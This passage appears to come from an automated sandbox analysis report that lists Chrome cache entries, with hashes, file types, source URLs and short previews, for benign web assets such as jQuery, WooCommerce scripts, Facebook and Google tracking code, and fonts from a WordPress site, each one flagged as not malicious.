                                                                        Category:downloaded
                                                                        Size (bytes):244801
                                                                        Entropy (8bit):5.453841413977933
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C9C37DBE6B077A4AAEEEA29AF4857656
                                                                        SHA1:E9A790D720E436BA047D67C4D441E840D660433D
                                                                        SHA-256:C4EB49795F7A703429E7012CEC0A556E6FAF6F551F07CD337F66C5A1EC3A5847
                                                                        SHA-512:660F8CD397BAFA6D8F44BA4C2CD066AAF934A69B5E608D6CE63636240E339ACFF93AE9B72F6B01C4E29BF9C89B11A73C2D5D3F36EFEAD5194D138B38F7E0DFA4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://connect.facebook.net/en_US/fbevents.js
                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI

                                                                        Chrome Cache Entry: 350

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (13054), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):13054
                                                                        Entropy (8bit):5.177767631277299
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:917602D642F84A211838F0C1757C4DC1
                                                                        SHA1:392DF3FB4B0EC96CE4EBB5616E6B2A5C55A54BF8
                                                                        SHA-256:D702E5ED1E573918D912775AC1E88987FC177AA51EFE1253A08F71AB54F96516
                                                                        SHA-512:92AFC44A2405434F119E8E57732E232CDFADBDBA1948D3E89EAB596282119D14CF9707F36037B22C9DD6F3104AADECC28B9301D044842D60DD43CEA98DDBC929
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6
                                                                        Preview:(()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},a=(e,a)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(a)&&(a=n.get(a)),Array.from(n.values()).includes(a)||(a=`custom-${a=(a=a.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=a,e.setAttribute("data-status",a),e.classList.add(a),r&&r!==a){e.classList.remove(r);const a={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status:e.wpcf7.status,prevStatus:r};t(e,"st

                                                                        Chrome Cache Entry: 353

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1391)
                                                                        Category:dropped
                                                                        Size (bytes):1426
                                                                        Entropy (8bit):5.2713128211306
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:19D386C9004E54941C1CC61D357EFA5D
                                                                        SHA1:0A77594006C8D86FDCC0ADBC2B9AECAEF3869586
                                                                        SHA-256:3BC6467A95CEC8FA516C6F5F69E1301E37E16F9BB1046FE7756729249F901B95
                                                                        SHA-512:7811CF6BABB4DF41707F97D1BD65337B5AD7AAEDFF301FCEDB90FB7773FA9876F52458AA03A576910F6126384599EF25F8DE76EE309C22E1914D9CF444AEFB6F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! This file is auto-generated */.window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{\{([^\}]+?)\}\}(?!\})/g,variable:"data"};return function(t){if(document.getElementById("tmpl-"+e))return(n=n||_.template(s("#tmpl-"+e).html(),a))(t);throw new Error("Template not found: #tmpl-"+e)}}),wp.ajax={settings:t.ajax||{},post:function(t,e){return wp.ajax.send({data:_.isObject(t)?t:_.extend(e||{},{action:t})})},send:function(a,t){var e,n;return _.isObject(a)?t=a:(t=t||{}).data=_.extend(t.data||{},{action:a}),t=_.defaults(t||{},{type:"POST",url:wp.ajax.settings.url,context:this}),(e=(n=s.Deferred(function(n){t.success&&n.done(t.success),t.error&&n.fail(t.error),delete t.success,delete t.error,n.jqXHR=s.ajax(t).done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&

                                                                        Chrome Cache Entry: 354

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):10995
                                                                        Entropy (8bit):4.581601992681243
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5652F964FCB8A64A72D04590F2DCD9C1
                                                                        SHA1:DC61EA2516740E7511DA87F09BC22D7D3139CFCF
                                                                        SHA-256:8D2E4FDC471ECD2DB90102043B89011DB498A5FABE785FCF887B14EF05377428
                                                                        SHA-512:A94D5D5B48F72D8EB1CB2A1BBA0E8C785C141332B1CDADB6338F10B6B942C34D47D0CA6818236BFD286E3E7FB9CB5A44280F8362492F784561B14CB14FA9876A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0
                                                                        Preview:/*!. * headroom.js v0.11.0 - Give your page some headroom. Hide your header until you need it. * Copyright (c) 2020 Nick Williams - http://wicky.nillia.ms/headroom.js. * License: MIT. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. (global = global || self, global.Headroom = factory());.}(this, function () { 'use strict';.. function isBrowser() {. return typeof window !== "undefined";. }.. /**. * Used to detect browser support for adding an event listener with options. * Credit: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener. */. function passiveEventsSupported() {. var supported = false;.. try {. var options = {. // eslint-disable-next-line getter-return. get passive() {. supported = true;. }. };. window.addEventListener("test", options, options);

                                                                        Chrome Cache Entry: 355

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (16050), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):16050
                                                                        Entropy (8bit):5.288065661034305
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C480693CDE41218F9DF213280ED0EC8F
                                                                        SHA1:63763B3757A54503D5D04FA2D9C67396BA47AD64
                                                                        SHA-256:682B309B932A8D2B8D288D972F4BFA379CC761E64B7A633CA3CD7E10D56AD5B0
                                                                        SHA-512:1D37C2D59B010B9557B85084DBA3C685DD5B779CA9F14CE1C25E7E9E55711D02C21710690B2272D06741D497037E52CB6E49CF3867BCF21503CB774A60EB981F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){var t={1989:function(t,n,e){var r=e(1789),o=e(401),a=e(7667),c=e(1327),i=e(1866);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},8407:function(t,n,e){var r=e(7040),o=e(4125),a=e(2117),c=e(7518),i=e(4705);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},7071:function(t,n,e){var r=e(852)(e(5639),"Map");t.exports=r},3369:function(t,n,e){var r=e(4785),o=e(1285),a=e(6e3),c=e(9916),i=e(5265);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},2705:function(t,n,e){var r=e(5639).Symbol;t.exports=r},6874:function(

                                                                        Chrome Cache Entry: 357

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (64288)
                                                                        Category:dropped
                                                                        Size (bytes):374124
                                                                        Entropy (8bit):5.38002327405143
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4C40B91C5E5C8B2AA3A187D8A7FCC634
                                                                        SHA1:AA785BB3AD45F71A6C866C4895632B8FA6586E7B
                                                                        SHA-256:3DF5391E09EDBBA03D60DA8ED698C0E662DA73A86FCEAE2BFF79AB46ED6FBF6F
                                                                        SHA-512:1804A461A690E38156F178D05707EAD70F78A335EAE33677C5C653D5144FB6D220037E85637C8C581D1D00C28C0D23B27C53779949E4C8E8DC73A3AB1EEA7B7D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!.. - Slider Revolution JavaScript Plugin -............................xXXXXX................................... xXXXXX..xXXXXX..xXXXXX............................xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx.............. DATE: 2021-07-01..@author: Krisztian Horvath, ThemePunch OHG...INTRODUCING GIT.UPDATES AND DOCS AT:.https://www.themepunch.com/support-center..GET LICENSE AT:.https://www.themepunch.com/links/sli

                                                                        Chrome Cache Entry: 359

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2530)
                                                                        Category:dropped
                                                                        Size (bytes):223518
                                                                        Entropy (8bit):5.553545795827192
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1CB4EB241C2C1D0E0E1037EDE4EE7A9A
                                                                        SHA1:3C92579C8391F6805DC164E0E720956AB3D658B8
                                                                        SHA-256:90BE37AF615F148FF87B717529E2F05E6562957FD87DA37D4EFB31F76D552690
                                                                        SHA-512:2B53ADFC481393428184A772069CADBDE8B614AAE55875A362162F32BEC48436570E19E0D8C2FC992A4166B97B6D5FCB7864347E22DA111436AF41F289142660
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-2LEWGZ9NK3"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.affiliation"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.tax"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"ecommerce"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.shipping"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",

                                                                        Chrome Cache Entry: 360

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 7680 x 4321, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):3409680
                                                                        Entropy (8bit):7.75623820947467
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DCDBC1199AAECA81C7F2B3FEEC3E0E2C
                                                                        SHA1:CD378A53262BB1FCB60D47BF9753AB5BF4BC6E75
                                                                        SHA-256:72D29B99579A6FA75CB867FA4F28799A78054F8DBE438FF8E5FE550F250D7565
                                                                        SHA-512:B73310C0D27BABFA1B879169AB7B606B1DF4A181ACA409C145472C2B05D69AF57AA13B35BCD85E4350783310F433B92D31D3835048C377AF1625C0FFA4BE1E9F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.............}..6....pHYs..,J..,J.wztM.. .IDATx...$;v,..Y.._K...u.M/.U...G."Kdgn..0..0.................................................................W..............k..b......#.^g}V.......oMO......Q~..:....\.....#A...5...3...x..z~.........E..._.?...._.....5..l...3...U...._T{...\...|...........~...<.:.s.....iz8..ws.O.p..x..............Y~..E....k...>.........K.KtmF{..oV..m.s..z=W...,.@....8.?`~.9....o..h.vy.....h.g}Q~.=...5....7.U.....N..C.>3... o.......8>Z~........Gh:Uw.....J{*....S..|.........5..?..........=.....du..${..~..{..K...|.px.?..[...#....`........Q.#..0..2~W/..'.U..uL....x...<./...O....0...7....TD2.#..........<...C>.>J{..#.w.?Tw..~.O..|...,........w.....>S^|.~...AO.....,.6.m..1.'...?.....> ......U....x..jx.}........>4.)^..&..7(.'....1..}r<.=..C...o..5......G.'4...M.}^/....).K..}.w.........."r>g..}W.n.Q..R.....q.W.:.yC......hMO......$5.!....@$?.W-_.?...W..(....T.y..e.g{.?\..2=......9...O..cu......8..J..j........79....:.

                                                                        Chrome Cache Entry: 361

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (7043), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):7043
                                                                        Entropy (8bit):4.645957607820541
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:456663A286A204386735FD775542A59E
                                                                        SHA1:0A61620B88F4AE0FA7D71E2C7A014EA2C3AB5749
                                                                        SHA-256:A7A83E60E7E3B8CADEED69327BA498B4CD68605DB6E408729FA1B946758E7501
                                                                        SHA-512:880DC7B615DDC62135595976555F501AF8EA2F1C328B6CBDA1EF656C5D4BE7794AC0ECE5FAF8AE52EFE686C156F1C74646C67DA62D66E7BD88DCB36788860422
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=6.6.1
                                                                        Preview::root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}.woocommerce table.shop_table_responsive thead,.woocommerce-page table.shop_table_responsive thead{display:none}.woocommerce table.shop_table_responsive tbody tr:first-child td:first-child,.woocommerce-page table.shop_table_responsive tbody tr:first-child td:first-child{border-top:0}.woocommerce table.shop_table_responsive tbody th,.woocommerce-page table.shop_table_responsive tbody th{display:none}.woocommerce table.shop_table_responsive tr,.woocommerce-page table.shop_table_responsive tr{display:block}.woocommerce table.shop_table_responsive tr td,.woocommerce-page table.shop_table_responsive tr td{display:block;text-align:right!important}.woocommerce table.shop_table_responsive tr td.order-actions,.wooc

                                                                        Chrome Cache Entry: 362

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 76764, version 331.-31261
                                                                        Category:downloaded
                                                                        Size (bytes):76764
                                                                        Entropy (8bit):7.996848906523996
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:F7307680C7FE85959F3ECF122493EA7D
                                                                        SHA1:FCE0DA592A3E536D6D5DF5B50CB513398D8C5161
                                                                        SHA-256:43C072C16C9EE6D67ACDFA6C6D6685FF1E74EB4237B7CC3C1348AB1C108B26AF
                                                                        SHA-512:D115A6F0DF1F766FC83A77ADEFF79DA5B0A463C01C13532CF48F29ED53A0C4EF1D87DB38B8E492FBC3F97A0D192A9A6F636B837E65FCBEAC03BB6F36336CA69E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2
                                                                        Preview:wOF2......+...........+..K......................?FFTM....`..r.....d....6.$..0..... .....k[.qEa..*v...m.pG......"..9z...8...>....5.B.v....1..........6....G_RA...P.8.a.2r.g....X.u.d..4;.LN..<.. GV..q"."."..........t..!._..!...4...=j.=b?q.lhg.u...I.E...[d8.KY.h......7N.../.?Y...9........l...A..L.$C.%..D.:dJ...ZZgiv7..nLrA...o.k[.E..2S.l..Vp...g..3=...y.e._....% ........k.....w:...P..h......OoH.#&......D...!....s..}......aB...4..(.q....I..z.F(....^;.$.C..L...../.N...G./....O..wQScM..K.fP.....FP..s...`..ZX. ...%.Hj.....X.!V....Q..}..o...b[N4.;`".o.\^.S........D5IM.Bk.}...v...........v.9......j..... %.C'.C;.0...C......*X5k.WDnM...H.AB@Q..1...+...+]f.vJ......p..b..r.:m..b..o)..\.'Mn.dQ-9N2h.3. .X....=....A...4......g...pZ.6W#.7.|...93...u.B^,'.!..Z..P......1...rZu....d.8..+.T.d..h...w.....9..p.Gd...0igw'l.V..].*!.V..A..UDB.IH.lI... ..-.....o.v...cgl..!b...8.;.=~..h@.-.....4a.....G...`...........~..8..L..4I.1.4N|....=\..t}`..X"0|..P......9.EF......

                                                                        Chrome Cache Entry: 363

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1665
                                                                        Entropy (8bit):4.2829135862996495
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0B3F95A864BCF6A1F4215D5405CB252C
                                                                        SHA1:2014EA5BA49313BC63BD2311A283FB7BB2E93013
                                                                        SHA-256:207D9044E5B72E312D09A6004BF10170FE47E38503CC39F5DA517571DEB4B6E9
                                                                        SHA-512:DF3466D866A8407A286F4CFC70C7A314F69C9A3DF0E40207B638A9C3CCB38C58670589F03298CA0844B9A8B26FFD80C144FB5267E106A2F2261297827BEC5684
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_featured.js?ver=3.3.0
                                                                        Preview:"use strict";..function woof_init_featured() {.. if (icheck_skin != 'none') {.. jQuery('.woof_checkbox_featured').iCheck({. checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color,. });.. jQuery('.woof_checkbox_featured').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. woof_current_values.product_visibility = 'featured';. woof_ajax_page_num = 1;. if (woof_autosubmit) {. woof_submit_link(woof_get_submit_link());. }. });.. jQuery('.woof_checkbox_featured').on('ifUnchecked', function (event) {. jQuery(this).attr("checked", false);. delete woof_current_values.product_visibility;. woof_ajax_page_num = 1;. if (woof_autosubmit) {. woof_submit_link(woof_get_submit_link());. }. });.. } else {. jQuery('.woof_checkbox_featured').on('change', function (e

                                                                        Chrome Cache Entry: 365

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 20144, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):20144
                                                                        Entropy (8bit):7.988855976137295
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:214F75E42AA5CFCA07257CBF8C64E83C
                                                                        SHA1:BA4BBE71D4AB266BC145305217CDF86A7777137F
                                                                        SHA-256:A6760631FECFE59ED152AEB2C51FDCB515AC00CD4755449016B5B34813735D00
                                                                        SHA-512:E8D896C8C3509941FBCE96E2847838A520B3BC8D94348B1121840A1A2A45328BE939238423A03CDFB7823CF128EEC3190DE8B4C1924553D603EF02FA856217E0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xIIzI.woff2
                                                                        Preview:wOF2......N........p..NI.............................Z..|.`..J.R..<.....$..}..Z...x.6.$..0. .... ..D.6..r.L......r.....y.B....(j''.L..)A.1.k...DEHA.O,...@..C;..SE.g.ch.{.t..F...?zW....|.r.p..dO1..-.).Q.9.Z......?v..>......).9@."..\}.(.[....I.u......mc...`...#.[.Q!.%B.("!......``c....._....:.u&~......&'.I.x.>..R.......@.4...]|f9V.u.4v.+...E.~=..{+.....]..&X...L...Z..>O.WH...Z..!.T..:..G..1....2.HR....1...U..N....}.D^.:`E.P.:._~....-Qv.....> .t;..[...B.pE.(T.W1...t.........m.....X..F...]i....$.]..e.VSt.NNo......}.=#.B.0.gds....h...ns.Tv..$<_....2F.Kd.;..\.F......B.p)|.%.<[..YJ..l..CP....F..x{...}...f.&..Ci......;...V............./....w...+.I.B.Y...r.........Q...........X.-cL.g3)...a. ..D..w./x.V...Z.`N.25/..)M&...ys../.{E.ezR:V..2V5.+....;....._.[$*J.r....A0tW.u....L........*&T....~.z........10...3%.`%..urP i.9...M.i4M....L...q...N.........%...w.......?7>.........5.!..|8..."N...Y.....E...M|..._N..v{].._..Ex..J.7....aJ;...#u..W...Sk.9...Vn.]......D..

                                                                        Chrome Cache Entry: 369

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5552)
                                                                        Category:dropped
                                                                        Size (bytes):72593
                                                                        Entropy (8bit):5.332700741129292
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AAA706A00E7F15E53E03D39B4045A294
                                                                        SHA1:A4EE1013A0308037E0DEE7466ECD0F47301FA6C9
                                                                        SHA-256:1DB36C3CA34D615BBA7204EB6293655D4A1BE76BC6072D10A43EFA2F56E3CA58
                                                                        SHA-512:AB808E2BFDFF8871955B9944CD3A702DCCF7235C9944D89CED05A8E6132A0511505312D43C0BE0B1577E8BFA923D2985EEAFA41D8828533A73364A4944E1C652
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI

                                                                        Chrome Cache Entry: 370

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):18
                                                                        Entropy (8bit):3.5724312513221195
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                        SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                        SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                        SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:404 page not found

                                                                        Chrome Cache Entry: 371

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65447)
                                                                        Category:dropped
                                                                        Size (bytes):87553
                                                                        Entropy (8bit):5.262620498676155
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

                                                                        Chrome Cache Entry: 374

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                        Category:dropped
                                                                        Size (bytes):43
                                                                        Entropy (8bit):2.7374910194847146
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:GIF89a.............!.......,...........D..;

                                                                        Chrome Cache Entry: 375

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2935
                                                                        Entropy (8bit):4.174503977015458
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5B2F6DA440BA208EECC15960E70D0B94
                                                                        SHA1:C9A817396AE1643141586206B0D320A8C7165C63
                                                                        SHA-256:97F0CACD19D339EFCC1A6B913F155C4002DF12FB9EA984D975BA87D481B2C67A
                                                                        SHA-512:66CA5C97A7383112F9D0D5CD89EE8DFC0937AF1235C269684A85F45C3A02035FAF38C3B91FED297810E37D6C333E883A00A44120B734861B9302EBD84112BEA9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:"use strict";.function woof_init_sliders() {. jQuery.each(jQuery('.woof_taxrange_slider'), function (index, input) {... try {. .. var slags = jQuery(input).data('slags').split(',');. var tax = jQuery(input).data('tax');.. var skin = jQuery(input).data('skin');. var current = String(jQuery(input).data('current')).split(',');. var from_index = 0, to_index = slags.length - 1;.. //***. if (current.length > 0 && slags.length > 0) {. jQuery.each(slags, function (index, v) {. if (v.toLowerCase() == current[0].toLowerCase()) {. from_index = index;. }. if (v.toLowerCase() == current[current.length - 1].toLowerCase()) {. to_index = index;. }. });. } else {. to_index = parseInt(jQuery(input).data('max'), 10) - 1;. }.. jQuery(inpu

                                                                        Chrome Cache Entry: 376

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3235)
                                                                        Category:downloaded
                                                                        Size (bytes):3236
